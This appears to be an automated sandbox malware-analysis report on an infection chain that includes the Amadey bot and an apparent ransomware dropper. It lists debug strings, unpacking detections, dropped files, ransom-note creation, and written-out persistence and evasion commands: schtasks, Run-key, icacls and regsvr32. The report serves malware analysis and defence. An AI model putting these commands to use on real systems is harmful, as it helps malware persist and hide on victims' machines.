Source:	Binary string: EfiGuardDxe.pdb7 source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\mihagebuzafo_tuxolakozeyaj\soniliwutur.pdb source: 958B.exe
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb) source: C5F5.exe, 00000016.00000000.2629982965.0000000000A59000.00000002.00000001.01000000.0000000E.sdmp, C5F5.exe, 00000016.00000002.2638549211.0000000000A59000.00000002.00000001.01000000.0000000E.sdmp, yiueea.exe, 00000017.00000002.4499053773.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000017.00000000.2636515724.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000023.00000000.2656559370.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000023.00000002.2658641164.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\kik69\fazesepovaf\wujupofo fev\bekusizitib\mo.pdb source: F3CC.exe, 00000026.00000000.2685374725.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: C5F5.exe, 00000016.00000000.2629982965.0000000000A59000.00000002.00000001.01000000.0000000E.sdmp, C5F5.exe, 00000016.00000002.2638549211.0000000000A59000.00000002.00000001.01000000.0000000E.sdmp, yiueea.exe, 00000017.00000002.4499053773.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000017.00000000.2636515724.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000023.00000000.2656559370.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp, yiueea.exe, 00000023.00000002.2658641164.00000000001C9000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\m33GTEHGLLA6RxB7CWRFamBm9te4a9Dn\Provide.pdb% source: A079.exe, 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Unpacked PE file: 8.2.958B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Unpacked PE file: 24.2.958B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Unpacked PE file: 36.2.958B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Unpacked PE file: 39.2.958B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Unpacked PE file: 40.2.2899.exe.400000.2.unpack
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Unpacked PE file: 44.2.build2.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vusretg	Unpacked PE file: 5.2.vusretg.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Unpacked PE file: 8.2.958B.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Unpacked PE file: 24.2.958B.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Unpacked PE file: 36.2.958B.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Unpacked PE file: 38.2.F3CC.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Unpacked PE file: 39.2.958B.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Unpacked PE file: 40.2.2899.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Unpacked PE file: 44.2.build2.exe.400000.0.unpack .text:ER;.data:W;.tixecil:W;.rake:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014A1 push es; iretd	0_2_004014A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004022A8 pushfd ; ret	0_2_004022C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00841506 push es; iretd	0_2_0084150A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084230F pushfd ; ret	0_2_0084232E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F23B8 push es; iretd	0_2_008F23D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F28CE push 8A1E29FAh; iretd	0_2_008F28D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F8FFB push cs; iretd	0_2_008F8FFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F2EF6 pushfd ; ret	0_2_008F2FD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F575A push ss; iretd	0_2_008F5760
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_004014A1 push es; iretd	5_2_004014A3
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_004022A8 pushfd ; ret	5_2_004022C7
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00630066 push 8A1E29FAh; iretd	5_2_0063006B
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00632EF2 push ss; iretd	5_2_00632EF8
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0063068B pushfd ; ret	5_2_0063076A
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0062FB50 push es; iretd	5_2_0062FB70
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00636793 push cs; iretd	5_2_00636795
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00761506 push es; iretd	5_2_0076150A
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0076230F pushfd ; ret	5_2_0076232E
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_004A4D84 push eax; ret	7_2_004A4D9E
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00406785 push ecx; ret	7_2_00406798
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_022660AF push ecx; retf	7_2_022660B2
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_02418F05 push ecx; ret	7_2_02418F18
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00428565 push ecx; ret	8_2_00428578
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005A221B push ecx; ret	9_2_005E34A3
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00675134 push ecx; iretd	9_2_00675137
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0067357A push ebp; iretd	9_2_00673591

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_00404BF9 LoadLibraryW,GetProcAddress,VirtualProtect,

7_2_00404BF9

Source: 5DA4.exe.2.dr

Static PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A9E0.dll

Source: A079.exe.2.dr	Static PE information: section name: .00cfg
Source: setup[1].exe.23.dr	Static PE information: section name: .sxdata
Source: setup.exe.23.dr	Static PE information: section name: .sxdata
Source: build2.exe.24.dr	Static PE information: section name: .tixecil
Source: build2.exe.24.dr	Static PE information: section name: .rake
Source: build2[1].exe.24.dr	Static PE information: section name: .tixecil
Source: build2[1].exe.24.dr	Static PE information: section name: .rake
Source: build3.exe.24.dr	Static PE information: section name: .kic
Source: build3[1].exe.24.dr	Static PE information: section name: .kic
Source: softokn3.dll.44.dr	Static PE information: section name: .00cfg
Source: nss3.dll.44.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.44.dr	Static PE information: section name: .didat
Source: mozglue.dll.44.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.44.dr	Static PE information: section name: .00cfg

Source: yiueea.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x4fff7
Source: B184.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x2594a
Source: setup[1].exe.23.dr	Static PE information: real checksum: 0x0 should be: 0x73043d
Source: A079.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x11e837
Source: setup.exe.23.dr	Static PE information: real checksum: 0x0 should be: 0x73043d
Source: C5F5.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4fff7
Source: 2899.exe.2.dr	Static PE information: real checksum: 0x420b5c should be: 0x423a42

Source: initial sample	Static PE information: section name: .text entropy: 7.624056923243651
Source: initial sample	Static PE information: section name: .text entropy: 7.95593940550675
Source: initial sample	Static PE information: section name: .text entropy: 7.630928436339549
Source: initial sample	Static PE information: section name: .text entropy: 7.624056923243651
Source: initial sample	Static PE information: section name: .text entropy: 7.630928436339549
Source: initial sample	Static PE information: section name: .text entropy: 7.95593940550675

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4503622640.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yiueea.exe PID: 5596, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vusretg			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\afsretg			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5DA4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\treelatest.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\setup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\afsretg	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	File created: C:\Users\user\AppData\Local\Temp\1000112001\setup.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B184.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\958B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2899.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	File created: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C5F5.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F3CC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vusretg	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A9E0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A079.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\$WinREAgent\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\$WinREAgent\Scratch\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\958B.exe	File created: C:\Users\user\_readme.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49744

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vusretg:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\afsretg:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

8_2_00481920

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
